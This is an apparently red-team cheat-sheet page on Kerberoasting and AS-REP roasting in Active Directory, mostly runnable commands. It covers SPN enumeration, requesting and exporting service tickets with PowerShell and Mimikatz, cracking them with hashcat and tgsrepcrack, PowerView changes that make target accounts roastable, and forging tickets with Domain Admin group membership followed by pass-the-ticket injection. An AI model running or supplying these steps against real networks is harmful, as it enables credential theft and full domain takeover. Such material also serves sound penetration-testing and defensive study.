Kerberosting / AS-REP Rosting

Kerberosting

The process of cracking Kerberos service tickets and rewriting them in order to gain access to the targeted service is called Kerberoast. This is very common attack in red team engagements since it doesn’t require any interaction with the service as legitimate active directory access can be used to request and export the service ticket which can be cracked offline in order to retrieve the plain-text password of the service. This is because service tickets are encrypted with the hash (NTLM) of the service account so any domain user can dump hashes from services without the need to get a shell into the system that is running the service.

Red Teams usually attempt to crack tickets which have higher possibility to be configured with a weak password. Successful cracking of the ticket will not only give access to the service but sometimes it can lead to full domain compromise as often services might run under the context of an elevated account. These tickets can be identified by considering a number of factors such as:

SPNs bind to domain user accounts
Password last set
Password expiration
Last logon

Specifically the Kerberoast attack involves five steps:

SPN Discovery
Request Service Tickets
Export Service Tickets
Crack Service Tickets
Rewrite Service Tickets & RAM Injection

The discovery of services in a network by querying the Active Directory for service principal names.

SPN Discovery

Services that support Kerberos authentication require to have a Service Principal Name (SPN) associated to point users to the appropriate resource for connection. Discovery of SPNs inside an internal network is performed via LDAP queries and can assist red teams to identify hosts that are running important services such as Terminal, Exchange, Microsoft SQL etc. and being stealthy at the same time. Furthermore identification of SPNs is the first step to the kerberoasting attack.

Using SetSPN Binary

setspn -T megabank -Q */*

Services that are bind to a domain user account and not a computer account are more likely configured with a weak password since the user has selected the password. Therefore services which they have their Canonical-Name to Users should be targeted for Kerberoasting. From the list of SPNs below the service sql.megabank.local is associated with a user account.

Using Kerberost Toolkit

. .\GetUserSPNs.ps1

Using cscript.exe

There is also a VBS script which is part of the same tookit and can provide the same information. The script can be executed from the windows command prompt by using the native Windows binary cscript.

cscript.exe GetUserSPNs.vbs

Using Impacket

Service Principal Names can be also discovered from non-joined domain systems with the python version of GetUserSPNs which is part of impacket. However valid domain credentials are required for communication with the Active Directory as token based authentication cannot be used.

./GetUserSPNs.py -dc-ip 192.168.56.208 megabank.local/client2:"password.321"

Manual

# Request TGS for kerberoastable account (SPN)
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sqlserver.targetdomain.com"

# Dump TGS to disk
Invoke-Mimikatz -Command '"kerberos::list /export"'

# Crack with TGSRepCrack
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\mssqlsvc.kirbi

Targeted kerberoasting by setting SPN - We need have ACL write permissions to set UserAccountControl flags for the target user, see above for identification of interesting ACLs. Using PowerView:

Set-DomainObject -Identity TargetUser -Set @{serviceprincipalname='any/thing'}

AS-REP roasting

Get the hash for a roastable user (see above for hunting). Using ASREPRoast.ps1:

Get-ASREPHash -UserName TargetUser

Crack the hash with Hashcat:

hashcat -a 0 -m 18200 hash.txt `pwd`/rockyou.txt --rules-file `pwd`/hashcat/rules/best64.rule

Targeted AS-REP roasting by disabling Kerberos pre-authentication - Again, we need ACL write permissions to set UserAccountControl flags for the target user. Using PowerView:

Set-DomainObject -Identity TargetUser -XOR @{useraccountcontrol=4194304}

Request Service Tickets

Using Powershell

# one ticket
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "WINDC/sql.megabank.local:60111"


# all tickets
 Add-Type -AssemblyName System.IdentityModel 
 setspn.exe -T megabank.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System. IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Execution of the klist command will list all the available cached tickets.

klist

Using Mimikatz

An alternative solution to request service tickets is through Mimikatz by specifying as a target the service principal name.

kerberos::ask /target:PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80

Similarly to klist the list of Kerberos tickets that exist in memory can be retrieved through Mimikatz and save the output to a file:

kerberos::list /export

Note that the service ticket file is binary. Keep this in mind when transferring it with a tool like Netcat, which may mangle it during transfer.

then we can use kerberost tool in kali to crack the service account ticket:

sudo apt update && sudo apt install kerberoast
python /usr/share/kerberoast/tgsrepcrack.py wordlist.txt 1-40a50000-megabank@HTTP~CorpWebServer.corp.com-CORP.COM.kirbi

Using Meterpreter KIWI

Alternatively loading the Kiwi module (meterpreter) will add some additional Mimikatz commands which can performed the same task.

load kiwi
kerberos_ticket_list

Or by executing a custom Kiwi command:

kiwi_cmd kerberos::list

Using Impacket

./GetUserSPNs.py -request megabank.local/client2

Invoke-kerberost

The Invoke-Kerberoast.ps1 664 script extends this attack, and can automatically enumerate all service principal names in the domain, request service tickets for them, and export them in a format ready for cracking in both John the Ripper and Hashcat, completely eliminating the need for Mimikatz in this attack.

Cracking The Hash

Hashcat

The service account hashes will also retrieved in John the Ripper format or this hashcat command:

hashcat -a 0 -m 13100  hash.txt tools/wordlist/SecLists/Passwords/xato-net-10-million-passwords-1000000.txt  --status

./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Rewrite

Make user appear to be a different user

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500

Add user to another group (in this case Domain Admin)

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512

Rewrite Service Tickets & RAM Injection

python kerberoast.py -p Password123 -r megabank_001.kirbi -w megabank.kirbi -u 500
python kerberoast.py -p Password123 -r megabank_001.kirbi -w megabank.kirbi -g 512

The new ticket can be injected back into the memory with the following Mimikatz command in order to perform authentication with the targeted service via Kerberos protocol.

kerberos::ptt PENTESTLAB.kirbi

Other Tools

PreviousPass The Ticket NextKerberos Delegation

Last updated 2 years ago